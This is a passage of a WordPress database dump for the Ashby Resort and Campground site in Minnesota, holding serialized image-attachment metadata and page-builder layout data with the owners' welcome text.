:150;s:6:\"height\";i:252;s:4:\"file\";s:13:\"logoSmall.png\";}}'),(478,208,'_wp_attached_file','2016/06/logoSmall2.png'),(479,208,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:149;s:6:\"height\";i:216;s:4:\"file\";s:22:\"2016/06/logoSmall2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"logoSmall2-149x150.png\";s:5:\"width\";i:149;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:22:\"logoSmall2-149x174.png\";s:5:\"width\";i:149;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:22:\"logoSmall2-149x116.png\";s:5:\"width\";i:149;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:22:\"logoSmall2-149x182.png\";s:5:\"width\";i:149;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:22:\"logoSmall2-149x182.png\";s:5:\"width\";i:149;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(480,209,'_wp_attached_file','2016/03/mnMap.png'),(481,209,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:4:\"file\";s:17:\"2016/03/mnMap.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(482,210,'_wp_attached_file','2016/03/pedal_minnesota_logo.png'),(483,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:153;s:6:\"height\";i:72;s:4:\"file\";s:32:\"2016/03/pedal_minnesota_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"pedal_minnesota_logo-150x72.png\";s:5:\"width\";i:150;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(484,211,'_wp_attached_file','2016/03/usa_logo.png'),(485,211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:96;s:6:\"height\";i:51;s:4:\"file\";s:20:\"2016/03/usa_logo.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(486,212,'_wp_attached_file','2016/03/mn.png'),(487,212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:96;s:6:\"height\";i:59;s:4:\"file\";s:14:\"2016/03/mn.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(488,2,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:15:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210000\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:1;a:15:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210001\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:2;a:15:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210002\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:146:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</h3>\n<h5 style=\"text-align: center;\"><em> </em></h5>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:19:\"_sow_form_timestamp\";s:13:\"1554065104861\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:17:\"sow-editor-210003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:2;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:2;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:3;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(489,2,'_panels_data_preview','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:164:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot. </h3><h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(490,213,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:158:\"<p>Welcome to Ashby Resort and Campground in Ashby Minnesota.</p><p>We look forward to making this your favorite vacation spot.</p><p>Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:2;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:1;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}i:3;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:2;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";i:1;}i:1;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}}}'),(491,214,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:158:\"<p>Welcome to Ashby Resort and Campground in Ashby Minnesota.</p><p>We look forward to making this your favorite vacation spot.</p><p>Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(492,35,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:242:\"<p style=\"text-align: center;\">Welcome to Ashby Resort and Campground in Ashby Minnesota.</p><p style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i:1;s:6:\"weight\";i:1;}}}'),(493,215,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:13:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cec8be267\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"46f19208-52bd-4586-aa0d-94e9ea4cae99\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:13:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:13:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:242:\"<p style=\"text-align: center;\">Welcome to Ashby Resort and Campground in Ashby Minnesota.</p><p style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</p><p style=\"text-align: center;\">Mike and Diane Bovee</p>\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:1;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:2;a:2:{s:4:\"grid\";i:0;s:6:\"weight\";d:0.333333333333333314829616256247390992939472198486328125;}i:3;a:2:{s:4:\"grid\";i: